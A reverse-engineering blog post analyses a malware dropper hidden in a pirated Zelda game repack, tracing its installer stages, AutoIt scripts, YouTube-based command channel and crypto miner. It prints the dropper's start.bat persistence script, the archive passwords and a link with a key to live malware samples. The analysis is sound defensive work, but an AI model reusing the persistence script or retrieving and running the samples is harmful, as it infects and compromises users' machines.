Never trust a repack…

The torrent I looked at was: The Legend of Zelda: Breath of the Wild CEMU 1.8.0b [Multi-Lang] by HZolomon.

TL;DR: It is definitely malware. All the torrent by HZolomon appear to have been infected with malware equal/similar to this one.

[MEGA Folder with relevant files] WARNING: THIS CONTAINS ACTIVE MALWARE (in case you didn’t read the title and like executing random files)… The key is 8NcPVw1TCm_dvZM9s2SU_g.

Tooling

I used x64dbg, DbgChild, TitanHide, CFF Explorer, Exe2Aut and VirtualBox.

You have to select the checkboxes in the DbgChild plugin to automatically attach x64dbg to any process started by the executable you’re currently debugging:

dbgchild

From here on I’ll just give a brief description of each analysis step.

setup.exe

VirusTotal

  • With innoextract (innounp has a similar error):
Stream error while parsing setup headers!
 ├─ detected setup version: 5.4.2
 └─ error reason: basic_ios::clear
If you are sure the setup file is not corrupted, consider
filing a bug report at http://innoextract.constexpr.org/issues
Done with 1 error.
  • Extracts %temp%\is-[A-Z0-9]{5}.tmp\setup.tmp (is-K35T2.tmp in MEGA folder)

  • Probably this is: http://forum.ru-board.com/topic.cgi?forum=5&topic=34920&start=0&limit=1&m=1#1 and/or http://krinkels.org/resources/categories/innoultra.29/

setup.tmp

VirusTotal

Command line (this is similar to what InnoSetup does from what I know):

"C:\Users\Admin\AppData\Local\Temp\is-RPR25.tmp\setup.tmp" /SL5="$230522,1892858,54272,F:\Users\Admin\Documents\Downloads\The Legend of Zelda - Breath of the Wild\setup.exe" 
  • Extracts %temp%\is-[A-Z0-9]{5}.tmp\ISDone.dll and some other files (including unarc.dll).

  • Put a DLL breakpoint on unarc.dll in x64dbg.

  • Start the installation, which causes more stuff to be extracted to %temp%\is-[A-Z0-9]{5}.tmp.

All the extracted files are hidden. You can use attrib -S -H to unhide them (Windows explorer doesn’t allow you to do uncheck the Hidden box for some readon).

  • Break on FreeArcExtract (see my earlier blog post for more details). TL;DR it runs unarc.exe with the function arguments as command line arguments.

Some of the commands used in FreeArcExtract:

l -- setup-2.bin
x -o+ -pawdawdawd -wF:\BotW\ -dpF:\BotW\ -- setup-2.bin
  • Find cbArcExtract at ISDone.dll:$1A340 from the first parameter of FreeArcExtract, break on the password? action check:

password check

Arc password: awdawdawd

The unarc.dll uses compression algorithm hooks from facompress.dll (relevant code) + hooks for CLS-compressors (relevant code, CLS-MSC.dll, CLS-srep.dll) so make sure to put those next to unarc.exe if you want to (safely) extract the files.

  • After all the files are extracted it runs DSETUP.exe, which at first looked fine, but looking a second time the file is not signed by Microsoft and it has no version information or anything.

DSETUP.exe

VirusTotal

This is an AutoIt executable (32 bit), it’s basically the first layer of the dropper. With Exe2Aut I extracted the script (slightly deobfuscated by hand):

dropper layer 1

It tries to identify your anti-virus and based on that drops CLDe2bugLog.txt in your temp directory with the FileInstall function. It then replaces the bytes 00000000001C0004 with 377ABCAF271C0004 (7z header) and extracts it with the following command:

CLDe2bugLog.txt e -p"DQMDDMNBQ3824Nnd2nd8812@2*$(#!&NDQB2" CRDebugLog.txt

The contents of CRDebugLog.txt, but the malware inside does pretty much the same thing. I (unfortunately) looked at the contents of dxdllreg_x86:

64.exe
SystemCheck.xml
start.bat

start.bat

attrib -h -r -s /S /D %userprofile%\AppData\Roaming\Microsoft\Windows\\svchost.exe
copy /y "64.exe" "%userprofile%\AppData\Roaming\Microsoft\Windows\svchost.exe"
attrib +h +r +s /S /D %userprofile%\AppData\Roaming\Microsoft\Windows\\svchost.exe
schtasks.exe /Create /XML "SystemCheck.xml" /TN "System\SystemCheck"
del 64.exe /f
del SystemCheck.xml /f
del CRDebugLog.txt /f
del CLDebugLog.txt /f
del "%0"

This copies the file to %userprofile%\AppData\Roaming\Microsoft\Windows\svchost.exe, which made it clear that this is indeed a malicious file. It then goes on to create a scheduled task with SystemCheck.xml.

SystemCheck.xml

SystemCheck.xml

This executes the newly-created svchost.exe with the -WindowsCheck command line every X amount of time (probably days, not really worth exploring in this case).

64.exe (svchost.exe)

VirusTotal

This file is packed with Enigma x64. TitanHide works fine for debugging Enigma (ScyllaHide has issues). The original entry point (OEP) is at 64.exe:$3059C . It has stolen bytes, but they are easy to retrieve:

48 83 EC 28 E8 BF B3 00 00 48 83 C4 28 E9 36 FE FF FF

EDIT: I have been asked on reddit to give more details about the “stolen bytes” mentioned here. Before I could answer user izizizizizizi gave a nice explanation:

“Stolen bytes” (is there any non-colloquial name for this I wonder) is a feature of many packers/protectors which prevents easy dumping. During the protection process, a part of the original executable code gets removed and stored in the protector stub. When it’s about to be executed there’s a redirection to the protector’s code instead of the original function. The stub either writes original code in some dynamic buffer and executes it or an obfuscated version of the original function is executed.

To get them I created my own Hello World-style AutoIt executable and pasted the entry point.

After the ‘unpacking’ enigma, I extracted the SCRIPT resource and put it in a Hello World AutoIt executable (32 bit), I then used Exe2Aut.exe to get the AutoIt script source code (irrelevant parts omitted):

stage2

The interesting part is the bot() function:

stage2 C2

It uses a YouTube video (reported, but please report again) as a command and control mechanism. If the description contains one of the _download, _run, etc. command it will perform certain actions based on the data in the description (such as downloading a file or updating to a newer version).

It also appears to run some kind of crypto currency miner, although I couldn’t find the SystemCheck executable:

miner

Well, that has been all for today. It has certainly been fun reversing malware for a change!

“Heb ik dat nou al gezouten?”



blog comments powered by Disqus

Published

12 July 2017

Category

reversing

Tags